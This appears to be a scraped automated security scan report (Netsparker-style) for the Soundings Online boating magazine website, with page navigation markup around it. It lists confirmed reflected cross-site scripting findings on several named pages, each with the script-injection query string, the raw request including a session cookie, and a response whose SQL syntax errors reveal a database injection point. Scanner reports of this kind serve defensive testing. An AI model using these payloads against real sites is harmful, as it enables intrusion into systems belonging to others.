href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span&..
- /boat-shop/q-a-a

/boat-shop/q-a-a CONFIRMED

http://www.soundingsonline.com/boat-shop/q-a-a?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x001FB6)</script>

Request

GET /boat-shop/q-a-a?'"--></style></script><script>netsparker(0x001FB6)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001FB6)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001FB6)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/q-a-a" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Soundings Magazine Answers Your Boating Questions</title> <link href="/boat-shop/q-a-a?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/q-a-a?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_q_a m_q_a"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 46, c_q_a<br />Menu: 94, m_q_a-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></..
- /boat-shop/new-boats

/boat-shop/new-boats CONFIRMED

http://www.soundingsonline.com/boat-shop/new-boats?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x001FE4)</script>

Request

GET /boat-shop/new-boats?'"--></style></script><script>netsparker(0x001FE4)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001FE4)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001FE4)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/new-boats" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Read about the Newest Boats and Specifications on Soundings Online</title> <link href="/boat-shop/new-boats?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/new-boats?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_new_boats m_new_boats"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 47, c_new_boats<br />Menu: 62, m_new_boats-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"..
- /news/mishaps-a-rescues

/news/mishaps-a-rescues CONFIRMED

http://www.soundingsonline.com/news/mishaps-a-rescues?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x001FEB)</script>

Request

GET /news/mishaps-a-rescues?'"--></style></script><script>netsparker(0x001FEB)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
